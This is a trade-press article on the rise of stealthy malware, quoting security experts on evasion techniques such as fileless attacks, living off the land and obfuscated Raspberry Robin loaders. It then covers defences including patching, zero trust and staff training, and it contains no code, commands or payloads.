As security systems and practices improve, criminals are using AI and other technology to super-charge malware so they can hide in plain sight. Recently, experts raised concerns over the rise of “hunter-killer malware”, a specific strain of malicious software that targets security tools on a compromised network and disables them.
More than two-thirds of recorded malware now uses stealth-oriented techniques, per research by Picus Security. Approximately 70% of malware samples the firm analyzed were found actively hiding from security teams, employing methods to persist in networks and dodge common security tools.
Amid this concerning rise in stealthy malware, what do firms need to look out for and what tools and techniques can be used to detect and mitigate it?
How does stealthy malware avoid detection?
Stealthy malware is increasingly able to avoid detection by traditional security measures. This type of malware often uses advanced techniques to hide, making it difficult for companies to identify and take action.
Threat actors initially avoided detection by creating malware that could avoid antimalware and antivirus programs, using methods such as changing its code and encrypting itself, says Matt Aldridge, principal solutions consultant at OpenText Cybersecurity. “But as technology has advanced, it has become more sophisticated and harder to detect and manage by IT teams.”
For example, it can impersonate legitimate tools, minimizing its footprints in the target system, says Dominik Birgelen, CEO of oneclick AG.
Stealthy malware has evolved from “simple obfuscation techniques” to “highly sophisticated methods” such as fileless malware and mimicking legitimate processes, says Ramprakash Ramamoorthy, director of research at Zoho and ManageEngine. “Fileless attacks include processes that reside only in memory, leaving no footprints for disk-based security systems to catch. This malware also mimics legitimate processes by blending in with normal system behavior and latching onto trusted processes to avoid suspicion.”
Stealthy malware often enters systems when users click on phishing links, download from untrusted sources, or connect to random public internet networks, says Ramamoorthy. “Once inside, stealthy malware often lies dormant for extended periods. It might slowly steal data, establish a persistent foothold, or wait for a trigger to unleash more damaging payloads.”
The dangers of stealthy malware
Stealthy malware is particularly dangerous because its hidden nature allows attackers to operate unnoticed for long periods of time. The malware can change its code and appearance with each infection, making it more challenging for traditional security solutions to identify and block it based on known signatures, says Birgelen.
When attackers remain undetected, they can carry out malicious activities on a larger scale, Birgelen says. “What's really tricky is how this malware can wear the disguise of legitimate tools, making it a real challenge to notice if our security defenses are actually down. It's like trying to find a needle in a haystack, except the needle keeps changing its shape and color.”
Aldridge describes how malware variants have advanced capabilities, including using “living off the land” techniques – harnessing existing tools in the environment for malicious use. “These techniques can enable them to stealthily discover the network, enumerate security policies, modify system configurations and move laterally without the need for any new code in the environment. Additionally, advanced rootkit technology is used to hide deep within or below the operating system.”
Alex Holland, senior malware analyst in the HP Wolf Security threat research team, describes how cyber-criminals have changed the way Raspberry Robin malware is spreading. “Threat actors have shifted to using highly obfuscated Windows Script Files (.wsf) with a range of anti-analysis and virtual machine detection techniques.
“This has made Raspberry Robin much harder to spot, triage, and protect against. In fact, currently the Windows Script loader is poorly detected by antivirus scanners on VirusTotal, and some samples are not being detected at all.”
Raspberry Robin can be used to download other malware families, Holland says. “This means threat actors can compromise organizations undetected, before delivering malware such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot, as well as disruptive human-operated ransomware attacks that steal, lock access to data, and halt operations.”
Holland recently analyzed a DarkGate PDF campaign which evaded detection by proxying links via advertising networks. “Each malicious link was obfuscated behind an advertising link, which helped cybercriminals to evade detection and even capture analytics about victims.”
Novel detection methodology for stealthy malware
Although it presents a real threat, businesses can mitigate stealthy malware with the right tools and techniques. The first step for any security team is to maintain robust security hygiene, says Boris Cipot, senior security engineer at the Synopsys Software Integrity Group. This includes promptly patching systems and software to address vulnerabilities, he says.
Maintaining strict authentication and authorization protocols coupled with vigilant monitoring helps detect any unusual access to systems and data. Meanwhile, monitoring email traffic, particularly scrutinizing attachments and links, is “crucial”, says Cipot.
Birgelen advises businesses to adopt zero trust architecture (ZTA). “We're talking about a mindset where we don't automatically trust anyone, whether they're inside the organization or coming from the outside.”
While ZTA isn’t tailor-made for tackling stealthy malware head-on, Birgelen calls it “a real game-changer” in managing the risks associated with it.
Find out why endpoint security needs to be part of a zero trust strategy
Many organizations are adopting AI-based threat detection tools and implementing tiered architectures. This sees applications arranged into logical and physical computing tiers to safeguard against stealthy malware, says Del Heppenstall, partner and head of cyber at KPMG UK.
“These architectures ensure that software capable of tampering with threat detection capabilities cannot do so without authorized human intervention,” Heppenstall explains. “Measures such as employing two-factor authentication or implementing server-side control modifications, such as limiting access to management software, are examples of this."
Overarching this, it’s also important to focus on employee education. This is something that should “underscore all effective cyber resilience and data protection strategies”, Aldridge says.
Businesses should have security awareness training programs to inform and educate employees on the latest threats in real-time, including information security, social engineering, malware, and industry-specific compliance topics, he says. “Phishing simulations can also be deployed to automatically schedule vulnerable users for re-education should any training issues be identified.”
